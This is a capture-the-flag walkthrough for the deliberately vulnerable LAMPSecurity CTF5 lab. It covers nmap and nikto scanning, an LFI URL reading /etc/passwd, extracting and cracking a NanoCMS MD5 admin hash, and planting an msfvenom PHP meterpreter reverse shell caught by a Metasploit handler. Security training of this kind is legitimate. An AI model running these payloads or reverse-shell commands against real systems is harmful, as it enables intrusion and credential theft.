LAMPSECURITY: CTF5 Full tutorial from scratch

Introduction

In this post, You will learn how to crack lampsecurity ctf 5 and below is the video format of the post, Check it out ????????

Visit here to download the box: LAMPSecurity: CTF5 ~ VulnHub

Video

Solving LAMPSECURITY: CTF5

Just follow the below steps and I am sure by end of the post, You will be able to clear the box and have any doubt comment down below or watch the video.

Identifying IP address

To identify the IP of the target I am just enter arp-scan -l or you can enter nediscover commend also.

arp-scan -l

Information gathering using Nmap

I am doing a a full port scan and also scanning for OS, and Service and version.

nmap -A -p- <Target IP> -T4

nmap -A -p- 192.168.1.38 -T4

Save the results and in a file and take a note of the OS and the service and also take a note on what all the ports are open.

While going through the nmap scan we can see multiple ports are open and I am guessing any one of the ports must be vulnerable.

Let’s copy the IP address of the target and paste in a browser and let’s see what we are getting.

Vulnerability analysis

Let’s run nikto and check for any vulnerability or you can also use the open vas or you can also use nessus to find vulnerability.

We will be exploiting the /index.php error because it indicates local or remote file inclusion is possible.

And the target machine is vulnerable to LFI/RFI vulnerability.

Just copy the below malicious code and paste in the browser and make sure you enter the correct atrget IP address.

http://192.168.1.38/index.php?page=../../../../../../../../../etc/passwd%00

We all knew that in /etc/passwd password will be existing and that’swhy we have entered the /etc/passwd

Look here what we got hooray betch ????

I also found some redirect which are quiet fishy and then I took a note of it just click on the blog menu. You will be redirected to http://192.168.1.38/~andy/

And I can see that the site is powered by nanoCMS, Well Nano CMS is an old version of php which is now discontinued.

I have searched on the google for possible vulnerability then I have found this site https://www.securityfocus.com/bid/34508/exploit

So, what it says is the password hash for the NanoCMS will be saved in /data/pagesdata.txt

Then, I enterd http://192.168.1.38/~andy/data/pagesdata.txt

Crack the MD5 Password hash

If you take a look at the password hash you will have an wild guess as MD5. So, I went to Ultimate Hashing and Anonymity toolkit (md5hashing.net) to decode the hash.

We have decoded the hash and the username is admin and the password is going to be shannon

Accessing as admin

Now go to this link and enter the username and password http://192.168.1.38/~andy/data/nanoadmin.php

Creating a reverse PHP shell

Let’s generate a Reverse PHP shell, To generate enter the below command ????????

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw

We have generated the reverse PHP shell

Copy from <?php to die() and paste in the new page

Open the NanoCMS Admin panel of the website, navigate to the New Page option and paste the reverse PHP shell in the Content section. Input any name in the Title and click on the Add Page.

Exploiting reverse PHP shell created using msfconsole

Enter these commend to exploit the php shell

msfconsole

msf > use exploit/multi/handler

Set the payloads now ????????
msf exploit(handler) > set payload php/meterpreter/reverse_tcp

Set the lhost and rhost to ????????, Set the lhost as the target IP address
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444

Now, let’s run the exploit
msf exploit(handler) > run

On the other side if you click on the shell you will get the meterpreter shell

Conclusion

This CTF5 level was little bit tough comparing to CTF4 but anyways it is really fun and there is also manual exploits. Out of 10 I can rate the box 5.5 as the difficulty.


Also Read: Bandit level 0 to 33 full tutorial

Also Read: Lampsecurity:CT4 Tutorial

Share your love
Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site